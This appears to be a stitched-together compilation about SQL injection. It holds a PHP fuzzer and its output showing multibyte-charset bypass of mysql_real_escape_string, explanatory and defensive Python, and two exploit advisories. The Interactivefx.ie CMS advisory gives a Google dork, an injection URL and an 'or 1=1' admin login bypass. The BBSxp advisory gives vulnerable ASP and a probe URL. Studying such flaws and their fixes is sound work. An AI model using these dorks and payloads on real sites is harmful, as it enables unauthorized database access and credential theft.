[231] => 2

[232] => 2

[233] => 2

[234] => 2

[235] => 2

[236] => 2

[237] => 2

[238] => 2

[239] => 2

[240] => 2

[241] => 2

[242] => 2

[243] => 2

[244] => 2

[245] => 2

[246] => 2

[247] => 2

[248] => 2

[249] => 2

[250] => 2

[251] => 2

[252] => 2

[253] => 2

[254] => 2

)

[ucs2] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT * FROM ucs2_users WHERE username = 'ÿ' OR 1=1 /* ' AND password = 'any' at line 1

[cp932] => Array

(

[129] => 2

[130] => 2

[131] => 2

[132] => 2

[133] => 2

[134] => 2

[135] => 2

[136] => 2

[137] => 2

[138] => 2

[139] => 2

[140] => 2

[141] => 2

[142] => 2

[143] => 2

[144] => 2

[145] => 2

[146] => 2

[147] => 2

[148] => 2

[149] => 2

[150] => 2

[151] => 2

[152] => 2

[153] => 2

[154] => 2

[155] => 2

[156] => 2

[157] => 2

[158] => 2

[159] => 2

[224] => 2

[225] => 2

[226] => 2

[227] => 2

[228] => 2

[229] => 2

[230] => 2

[231] => 2

[232] => 2

[233] => 2

[234] => 2

[235] => 2

[236] => 2

[237] => 2

[238] => 2

[239] => 2

[240] => 2

[241] => 2

[242] => 2

[243] => 2

[244] => 2

[245] => 2

[246] => 2

[247] => 2

[248] => 2

[249] => 2

[250] => 2

[251] => 2

[252] => 2

)

)

<?php
// Requires the legacy ext/mysql extension (PHP 5.x); the mysql_* functions were removed in PHP 7.
error_reporting(E_ALL);

// Set to 1 first to create the database and tables, then set to 0 to run the test.
$switch = 0;
$data = array();

$mysqlhost = 'localhost';
$mysqluser = 'root';
$mysqlpass = 'root';  // :p

$c = mysql_connect($mysqlhost, $mysqluser, $mysqlpass);

// Old versions of PHP don't have this function, so you need to create the database manually.
if ($switch == 1) {
    print "Creating database.....";
    mysql_create_db("fuzz", $c);
    print "Done!\n";
}

mysql_select_db("fuzz", $c);
$charsets = mysql_query("SHOW CHARACTER SET", $c);
// The result set is buffered on the client, so it stays readable after this link is closed.
mysql_close($c);

if ($switch == 1) {
    print "Creating tables.....\n";
}

while ($row = mysql_fetch_row($charsets)) {
    print $row[0]."....";
    // One fresh connection per charset. The charset is switched with SET CHARACTER SET,
    // so the client library (and therefore mysql_real_escape_string) never learns about it.
    $c = mysql_connect($mysqlhost, $mysqluser, $mysqlpass);
    mysql_select_db("fuzz", $c);

    if ($switch == 1) {
        // create demo table
        mysql_query("CREATE TABLE ".$row[0]."_users (
            username VARCHAR(32) PRIMARY KEY,
            password VARCHAR(32)
        ) CHARACTER SET '".$row[0]."'", $c);
        // populate table
        mysql_query("INSERT INTO ".$row[0]."_users VALUES('foo','bar'), ('baz','test')", $c);
    } else {
        mysql_query("SET CHARACTER SET ".$row[0], $c);
        for ($i = 1; $i < 256; $i++) {
            // Well, I could have used a set of variables as switches, but I'm lazy, so we get comment blocks instead, :p
            // Part 1
            // Single Quotes
            $user = mysql_real_escape_string(chr($i) . chr(0x27) . ' OR 1=1 /* ', $c);
            // Double Quotes
            //$user = mysql_real_escape_string(chr($i) . chr(0x22) . ' OR 1=1 /* ', $c);
            $passwd = mysql_real_escape_string('anything', $c);

            // Part 2
            //$user = mysql_real_escape_string(' '.chr($i), $c);
            //$user = addslashes(' '.chr($i));
            //$passwd = mysql_real_escape_string(' OR 1=1 /*', $c);

            // Part 3
            //$user = mysql_real_escape_string(chr($i).' ', $c);
            //$passwd = mysql_real_escape_string('test', $c);

            // Single Quotes
            $sql = "SELECT * FROM ".$row[0]."_users WHERE username = '{$user}' AND password = '{$passwd}'";
            // Double Quotes
            //$sql = "SELECT * FROM ".$row[0]."_users WHERE username = \"{$user}\" AND password = \"{$passwd}\"";
            // Test SQL
            //$sql = "SELECT * FROM ".$row[0]."_users WHERE 1=0";

            $res = mysql_query($sql, $c);
            if (!$res) {
                // keep the server's error message for this charset (see the ucs2 entry in the output)
                $data[$row[0]] = mysql_error($c);
            } else {
                $num = mysql_num_rows($res);
                if ($num > 0) {
                    // rows came back: the quote survived escaping and "OR 1=1" was executed
                    $data[$row[0]][$i] = $num;
                }
            }
        }
    }
    mysql_close($c);
    print "Done!\n";
}

if ($switch == 1) {
    print "<br>Done!\n";
} else {
    print "<pre>\n";
    print_r($data);
    print "</pre>";
}
?>
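Why every lead byte in the output above comes back with 2 rows: the script switches the server-side charset with SET CHARACTER SET, but mysql_real_escape_string() takes the charset from the client library, which still believes the connection is single-byte (latin1) and therefore escapes byte by byte. A probe such as 0xBF 0x27 becomes 0xBF 0x5C 0x27; a server reading the query as GBK consumes 0xBF 0x5C as one character and the quote is suddenly bare. The Python model below is an added example and not part of the page or of the fuzzer. It uses simplified lead/trail byte tables (structural ranges only, an assumption standing in for MySQL's my_ismbchar), reproduces the page's byte lists for gbk, sjis/cp932 and big5 under byte-at-a-time escaping, and then shows the charset-aware escaping libmysql applies once the client is told the charset through mysql_set_charset() (mysqli_set_charset() on mysqli) instead of a SET statement.

```python
from typing import Callable, List, Optional

# Simplified lead/trail byte ranges of the double-byte charsets that appear in the
# fuzzer output above. ASSUMPTION: a byte pair counts as one character whenever its
# bytes fall in these ranges; real codecs leave some pairs unassigned, but the
# structural ranges are what decide whether a 0x5C trail byte gets swallowed.
DBCS = {
    "gbk":  (range(0x81, 0xFF),
             list(range(0x40, 0x7F)) + list(range(0x80, 0xFF))),
    "sjis": (list(range(0x81, 0xA0)) + list(range(0xE0, 0xFD)),
             list(range(0x40, 0x7F)) + list(range(0x80, 0xFD))),
    "big5": (range(0xA1, 0xFA),
             list(range(0x40, 0x7F)) + list(range(0xA1, 0xFF))),
}
DBCS["cp932"] = DBCS["sjis"]

# Bytes that mysql_real_escape_string() rewrites, and what they become.
SPECIALS = {0x00: b"\\0", 0x0A: b"\\n", 0x0D: b"\\r", 0x1A: b"\\Z",
            0x22: b'\\"', 0x27: b"\\'", 0x5C: b"\\\\"}


def mb_len(data: bytes, pos: int, charset: str) -> int:
    """Stand-in for MySQL's my_ismbchar(): 2 if data[pos:pos+2] forms a valid
    double-byte character under `charset`, otherwise 0."""
    lead, trail = DBCS[charset]
    if pos + 1 < len(data) and data[pos] in lead and data[pos + 1] in trail:
        return 2
    return 0


def escape_single_byte(value: bytes) -> bytes:
    """Byte-at-a-time escaping: what the client library does while it still believes
    the connection charset is single-byte. The fuzzer ends up here because SET
    CHARACTER SET changes the server side only; the library is never told."""
    return b"".join(SPECIALS.get(b, bytes([b])) for b in value)


def escape_charset_aware(value: bytes, charset: str) -> bytes:
    """Escaping that knows the charset, after libmysql's escape_string_for_mysql():
    a complete multibyte character passes through untouched, and a dangling lead byte
    (one without a valid trail byte) is itself backslash-escaped so that it cannot
    pair up with the backslash inserted before a following quote."""
    lead = DBCS[charset][0]
    out = bytearray()
    i = 0
    while i < len(value):
        n = mb_len(value, i, charset)
        if n:
            out += value[i:i + n]
            i += n
            continue
        b = value[i]
        if b in lead:
            out += b"\\" + bytes([b])
        else:
            out += SPECIALS.get(b, bytes([b]))
        i += 1
    return bytes(out)


def literal_end(data: bytes, charset: str) -> Optional[int]:
    """Model of the server's string-literal scanner under `charset`: walk the bytes
    that follow an opening quote and return the offset of the first quote that is
    not escaped, or None. A complete multibyte character is consumed whole (a 0x5C
    trail byte included), and a backslash consumes the single byte after it."""
    i = 0
    while i < len(data):
        n = mb_len(data, i, charset)
        if n:
            i += n
            continue
        if data[i] == 0x5C:
            i += 2
            continue
        if data[i] == 0x27:
            return i
        i += 1
    return None


def injection_survives(escaped: bytes, charset: str) -> bool:
    """True when an unescaped quote is left: the literal closes early and the rest
    of the value is parsed as SQL."""
    return literal_end(escaped, charset) is not None


def vulnerable_lead_bytes(charset: str, escape: Callable[[bytes], bytes]) -> List[int]:
    """Repeat the fuzzer's Part 1 probe, chr($i) . chr(0x27) . ' OR 1=1 /* ', for
    every byte value and report the ones for which the quote survives escaping."""
    probe = lambda i: bytes([i, 0x27]) + b" OR 1=1 /* "
    return [i for i in range(1, 256) if injection_survives(escape(probe(i)), charset)]


if __name__ == "__main__":
    for cs in ("gbk", "sjis", "big5"):
        naive = vulnerable_lead_bytes(cs, escape_single_byte)
        aware = vulnerable_lead_bytes(cs, lambda v, c=cs: escape_charset_aware(v, c))
        print("%-5s single-byte escaping: %d exploitable lead bytes (%d..%d); "
              "charset-aware escaping: %d" % (cs, len(naive), naive[0], naive[-1], len(aware)))
```

The defensive conclusion is the one the model makes visible: set the connection charset through the client API (mysql_set_charset(), mysqli_set_charset(), or the charset option in PDO's DSN) so that escaping and parsing agree on what a character is, and prefer server-side prepared statements, where the value never travels through the lexer as part of the SQL text at all.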

Part 7: Interactivefx.ie CMS SQL Injection Vulnerability

================================================

Interactivefx.ie CMS SQL Injection Vulnerability

================================================


#[+] Discovered By : Inj3ct0r

#[+] Site : Inj3ct0r.com

#[+] support e-mail : submit[at]inj3ct0r.com

#[+] visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net

Site product: Interactivefx.ie

Product : Interactivefx.ie CMS

Google dork: ”Copyright Interactivefx.ie“

Sql Inj3ct0r Exploit:

server/event-details.php?id=223+select+username,password+from+users/*

Bypass authentication in admin panel:

login: or 1=1/*

pass: anypassyouwish

Part 8: BBSxp (Build: 8.0.4) Sql Injection Vulnerability

First published at www.nspcn.org; copyright belongs there.

============================================

Vulnerability published by: Tr4c3[at]126[dot]Com

Affected version: BBSxp 2008 (Build: 8.0.4); other versions not checked

Vulnerable file: MoveThread.asp

MoveThread.asp, lines 2-24

<%
if CookieUserName=empty then error("您还未登录论坛") ' logging in with a saved cookie is enough
ThreadID=Request("ThreadID") ' Sql Injection Vulnerability
If Not IsNumeric(ThreadID) then
    ThreadIDArray=Split(ThreadID,",") ' check for an array, to avoid an error on line 13
    if IsArray(ThreadIDArray) then
        for i=0 to Ubound(ThreadIDArray)
            if Execute("Select ThreadID from ["&TablePrefix&"Threads] where ThreadID="&ThreadIDArray(i)&"").eof then error "系统不存在该帖子的资料"
        next
        ThreadIDSql=int(ThreadIDArray(0))
    else
        error("参数错误")
    end if
Else
    ThreadIDSql=int(ThreadID)
End If
ForumID=Execute("Select ForumID From ["&TablePrefix&"Threads] where ThreadID="&ThreadIDSql&"")(0)
%>

The query is executed first and the permission check only comes afterwards, so an ordinary user can perform SQL injection.

Constructed URL: www.target.com/movethread.asp?ThreadID=1,1'

Submitting it returns the error message:

Microsoft JET Database Engine 错误 '80040e14'

字符串的语法错误 在查询表达式 'ThreadID=1'' 中。

/BBSXP_Class.asp,行 5

The SQL Server version is easier to exploit; against Access, NBSI seems to be able to guess only table and column names, not column values, which has to be done by hand.

Everyone is welcome to come to the [BK瞬间群] group for pointers.
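The defect in the ASP above is one of ordering: each element of the comma-separated ThreadID is concatenated into a query and executed, and only afterwards is element 0 forced through int(). The following is an added example, not code from the advisory or from BBSxp, showing the same lookup with the checks in the right order: every element is validated as an integer before any SQL is built, and the IDs are passed as bound parameters so that a value like 1,1' is rejected before it reaches the database. It uses sqlite3 as a stand-in for the Access/SQL Server back end; the table and column names follow the ASP code, the sample rows are constructed, and the caller's authorization check (which the advisory says should precede the query) is assumed to happen before this function is called.

```python
import re
import sqlite3
from typing import Dict, List

THREAD_ID_RE = re.compile(r"[0-9]+")   # one non-negative decimal integer, nothing else


class ParameterError(ValueError):
    """A ThreadID value that is not a comma-separated list of integers."""


def parse_thread_ids(raw: str) -> List[int]:
    """Validate the ThreadID request parameter before any SQL is built.
    Accepts "17" or "17,18,19". Every element must be all digits, so the
    advisory's "1,1'" fails at the second element; the original ASP ran one
    query per element first and applied int() only to element 0 afterwards."""
    if raw is None or raw.strip() == "":
        raise ParameterError("ThreadID is required")
    ids = []
    for part in raw.split(","):
        part = part.strip()
        if not THREAD_ID_RE.fullmatch(part):
            raise ParameterError("ThreadID element is not an integer: %r" % part)
        ids.append(int(part))
    return ids


def forums_of_threads(conn: sqlite3.Connection, table_prefix: str,
                      raw_thread_id: str) -> Dict[int, int]:
    """Return {ThreadID: ForumID} for every requested thread.
    Validation runs first; the IDs then travel as bound parameters, so the
    request can never change the shape of the statement. The table name is
    built from TablePrefix, which is server configuration, not user input."""
    ids = parse_thread_ids(raw_thread_id)
    placeholders = ",".join("?" * len(ids))
    sql = "SELECT ThreadID, ForumID FROM %sThreads WHERE ThreadID IN (%s)" % (
        table_prefix, placeholders)
    found = {tid: fid for tid, fid in conn.execute(sql, ids)}
    missing = [tid for tid in ids if tid not in found]
    if missing:
        # the equivalent of the ASP's "系统不存在该帖子的资料" error
        raise LookupError("no such thread(s): %s" % missing)
    return found


def outcome(conn: sqlite3.Connection, table_prefix: str, raw_thread_id: str) -> str:
    """Classify a request the way the handler would respond to it."""
    try:
        forums_of_threads(conn, table_prefix, raw_thread_id)
    except ParameterError:
        return "rejected before any query"
    except LookupError:
        return "unknown thread"
    return "ok"


def demo_connection() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the forum database (sample data,
    not taken from the advisory); the prefix "bbsxp_" is an assumption."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE bbsxp_Threads (ThreadID INTEGER PRIMARY KEY, ForumID INTEGER)")
    conn.executemany("INSERT INTO bbsxp_Threads VALUES (?, ?)", [(1, 10), (2, 10), (3, 20)])
    return conn


if __name__ == "__main__":
    conn = demo_connection()
    print(forums_of_threads(conn, "bbsxp_", "1,3"))
    for raw in ("1,1'", "1 OR 1=1", "1,2,", "9"):
        print("%-10r -> %s" % (raw, outcome(conn, "bbsxp_", raw)))
```

The two properties worth checking in any fix of this kind are visible in outcome(): a malformed list is refused without touching the database, and a well-formed list that names a missing thread is refused by the query result, not by a string-built WHERE clause.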
